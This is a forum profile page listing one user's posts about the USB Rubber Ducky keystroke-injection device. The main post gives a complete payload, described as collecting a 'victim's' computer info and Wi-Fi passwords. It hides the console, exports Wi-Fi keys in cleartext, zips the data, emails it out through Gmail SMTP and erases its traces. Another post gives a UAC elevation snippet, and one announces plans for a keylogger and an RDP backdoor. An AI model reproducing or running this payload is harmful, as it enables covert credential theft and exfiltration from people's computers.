Jump to content

Zeta

Active Members
  • Posts

    8
  • Joined

  • Last visited

Recent Profile Visitors

445 profile views

Zeta's Achievements

Newbie

Newbie (1/14)

  1. My final suggestion (which probably should have been my first) would be to check the FAQ. :)
  2. I don't want to be that guy but can u mark it as solved thx
  3. Thanks :)!!! I definitely will, I plan on adding a whole bunch of stuff. My goals #1. reconnaissance (this code plus maybe IP address info) #2. download and implement keylogger #3. Backdoor (probably enabling RDP since network access is already granted)
  4. hmmm, weird. And your using the ducky encoder with the proper keyboard setting for your country?
  5. I think this is due to the fact that the online ducky toolkit isn't so reliable. I too used the toolkit as soon as I got my ducky and it didn't work. I then decided to write my own easy script to test and see if my ducky was broken. Sure enough it worked! My suggestion would be to write your own basic script and see if that works. Once you learn how to write the ducky code, you can easily problem solve for more complicated programs. My first Payload is located here if you want to test it out. https://forums.hak5.org/index.php?/topic/35007-payload-wifi-profiles-computer-info-emailed-to-gmail/?hl=%2Bwifi+%2Busb+%2Brubber+%2Bducky I hope this helps
  6. I'm pretty sure the light color is dependent on what version of the Rubber Ducky you have. Mine flashes blue and it works fine. Is their any particular problem you're having with the duck?
  7. It could be that u are not bypassing UAC, try this code. STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 555 ALT y DELAY 555 ENTER ENTER ALT SPACE STRING M DOWNARROW REPEAT 111 ENTER
  8. Hello fellow Hak5 fans!!! I recently have just written my first USB Rubber Ducky Payload and thought I would share it. If you spot any errors/improvements let me know . REM Author: Zeta REM Date: 4/5/15 REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail. REM------------------------OPEN & HIDE------------------------ DELAY 750 GUI r DELAY 400 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 555 ALT y DELAY 555 ENTER ENTER ALT SPACE STRING M DOWNARROW REPEAT 111 ENTER REM ----------------------COLLECT & DUMP---------------------- STRING set TEMPDIR=%systemdrive%\de-temp ENTER STRING mkdir %TEMPDIR% ENTER STRING cd %TEMPDIR% ENTER STRING netsh wlan export profile key=clear ENTER STRING set > info.txt ENTER STRING cd.. ENTER REM ---------------------------------------------ZIPPING FILE--------------------------------------------- DELAY 450 STRING echo Set objArgs = WScript.Arguments > _zipIt.vbs ENTER STRING echo InputFolder = objArgs(0) >> _zipIt.vbs ENTER STRING echo ZipFile = objArgs(1) >> _zipIt.vbs ENTER STRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs ENTER STRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbs ENTER STRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbs ENTER STRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbs ENTER STRING echo wScript.Sleep 2000 >> _zipIt.vbs ENTER STRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zip ENTER DELAY 200 REM -----------------------------------EMAIL LOG VIA GMAIL----------------------------------- STRING powershell -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('USERNAME', 'PASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'EMAIL'; $ReportEmail.To.Add('EMAIL'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail) ENTER DELAY 100 REM ---------------------DELETE AND END--------------------- STRING RD /S /Q "%systemdrive%\de-temp" ENTER STRING TYPE nul > %systemdrive%\de-temp.zip ENTER STRING DEL /Q %systemdrive%\de-temp.zip ENTER STRING TYPE nul > %systemdrive%\_zipIt.vbs ENTER STRING DEL /Q %systemdrive%\_zipIt.vbs ENTER STRING exit ENTER
×
×
  • Create New...